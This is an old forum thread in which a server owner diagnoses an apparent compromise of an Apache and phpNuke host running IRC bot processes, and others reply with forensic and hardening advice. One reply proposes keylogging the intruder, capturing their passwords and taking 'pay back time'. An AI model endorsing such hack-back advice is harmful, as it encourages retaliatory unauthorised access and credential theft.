Sever compromised?
Hi all.
I'm very worried about the security of my companies server. We only have a web server and sshd running on it . Its a mandrake 9.2 machine with apache2-2.0.47 on it. When looking at the syslog i started getting suspicious. I then did a netstat -anp which made me even more worried. Here is how it looks: Code:
tcp 0 1 192.16.4.2:57467 62.235.13.228:6667 SYN_SENT 13199/uptime I've found out that all these programs that are trying to access irc ( Is this correct?) are running under the apache user, which means that our webserver has been hacked, or so I think. Luckily the firewall is blocking these outgoing messages. Also there was a program called "mech" running doing exactly the same as the programs above, but i've now killed it, so it's no longer running. It is also interesting that this mech program was located in /var/tmp/PsY/ Well I think it is quite obvious what my question is. Is there a vulnerability in my webserver configuration and how do I go about finding it? Any suggested reading that I should do? Also I've been using tripwire so I'm going to go through its report to try find out what has happened. Any advice would be greatly appreciated! Avatar |
Hi.
Yes you've been cracked. Do a google search for 'psy.tgz' for further info. Before you do that, though, get that server off the network - who knows what else it's being used for. Dave |
Thanks Dave for your reply.
I took the server off the Net. But I would really like to learn more about what happened, or else it will keep happening. I've taken a look at the syslog and it seems shorewall started blocking these IRC requests on the 23 March. So I've not been very observant :-( Surely there is some way to search the relevant logs for events that happened around that time? I just don't know which logs to check. I'm guessing that whoever hacked the server wanted to keep this server accessible for later on, so there must be something in the startup scripts ( or similar) that I can use to find more info. I've also found out that apache now has port 4000 open ( the door for the hacker, I'm guessing) How would I find out if the person has hacked only apache or has been able to hack root? I really want to use this bad experience as a way to learn more about security, so _any_ hints or additional info would really be appreciated. Thanks Avatar |
I just had an idea.
How about you put a nice keylogger and another computer bridging the connection so you can sniff it without the hacker noticing it? Now you let the hacker play around on your server and he is bound to log into something or do some stuff. So you log his passwords :) and get to know his ip and as he seems to like irc his nick and other info on him. You might even find out how he is getting in. You would hack the hacker. You can then do what you want but I would say pay back time :D |
First let me say that a complete format and reinstall will be necessary when your done doing forensics.
Probably good places to start looking would be to take a look at the apache/httpd logs for any abnormal error messages. Also look through the general system logs for anything suspicious. You should definitely download and run rootkit hunter and chkrootkit on the system, as there are a bunch of things listening as services that shouldn't be (like init for example), which makes a rootkit likely. If that's the case, then you may need to use a cd-based distro like knoppix-std or FIRE to do any further analysis. You may have some luck looking those processes up by their process ID number in /proc/<PID>/cmdline. If you find anything interesting there (like a path to the binary) take a look at the contents and see what you can find. With regards to how you got cracked, what version of apache were you running? Were you hosting any content other than static html pages, like cgi or php for example? File permission for stuff in the server root? |
Thanks guys for your replyies.
I'm not in front of my server right now, so all the info I post now is out of my head. I will make sure that I format and reinstall once I've my detective work. I have run the chkrootkit and found an infected item ( I will post more detail later, when I'm infront of my box) listening on port 4000. I've found the direrectory where the hacker downloaded/placed his tools, It's in /var/tmp if I'm not mistaken and that directory is owned by the apache user. And yes init was running and located in this directory. What is the relevance of init running? Quote:
Thanks very much for the links, I see I have much reading to do. Cheers Avatar |
phpnuke is one of the most prone cms i've ever used/experienced. convert to postnuke or get other cms to work with. what version is your phpnuke?
|
I've read up on phpnuke too, and wanted to start a website using that program, but I was apprehensive about it.
To prevent something like this again, you might want to try the patched versions from Nuke fixes, which, among other things, filter out mysql injection attacks. Also, check out mod_security for apache. This prevents popular web attacks before they reach the script. I use the rules from http://www.gotroot.com/mod_security+rules |
Sorry for the delay.
We were using phpNuke 7.4. I'll take a look at mod_security. Thanks all for your help. Avatar |
howzit
Check /var/log/messages and /var/log/secure files as well chees boot :D lekker blei |
once you're done hacking the hacker, report as much as possible about him to the FBI
|
You might consider using a chrootkit as well, to detect any malicious software which might have been installed recently!
|
All times are GMT -5. The time now is 05:30 AM. |